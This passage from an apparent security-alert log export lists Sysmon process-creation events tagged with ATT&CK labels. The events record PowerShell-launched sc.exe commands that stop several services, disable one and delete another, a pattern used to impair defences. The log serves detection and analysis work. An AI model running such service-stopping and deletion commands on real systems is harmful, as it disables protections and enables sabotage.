-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.725",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.543 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a5ef2500} +ProcessId: 7296 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.545724800Z"",""eventRecordID"":""2891"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.543\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a5ef2500}\r\nProcessId: 7296\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.543"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010a5ef2500}"",""processId"":""7296"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.669",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:55.500 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b6ea2500} +ProcessId: 7528 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.502783300Z"",""eventRecordID"":""2888"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.500\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010b6ea2500}\r\nProcessId: 7528\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.500"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010b6ea2500}"",""processId"":""7528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.623",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.424 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010e2e22500} +ProcessId: 7496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.427242500Z"",""eventRecordID"":""2885"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.424\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010e2e22500}\r\nProcessId: 7496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control 
Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.424"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010e2e22500}"",""processId"":""7496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.591",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.410 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001073e02500} +ProcessId: 8136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config National Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config National Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.413299200Z"",""eventRecordID"":""2884"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.410\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001073e02500}\r\nProcessId: 8136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config National Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.410"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001073e02500}"",""processId"":""8136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config National Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.567",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.364 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9d82500} +ProcessId: 1480 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.367264600Z"",""eventRecordID"":""2882"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.364\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010a9d82500}\r\nProcessId: 1480\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:55.364"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010a9d82500}"",""processId"":""1480"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.481",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.320 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4d22500} +ProcessId: 7372 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.322884800Z"",""eventRecordID"":""2879"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.320\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d4d22500}\r\nProcessId: 7372\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.320"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d4d22500}"",""processId"":""7372"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.452",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.283 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010ddcf2500} +ProcessId: 6420 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete \gm 
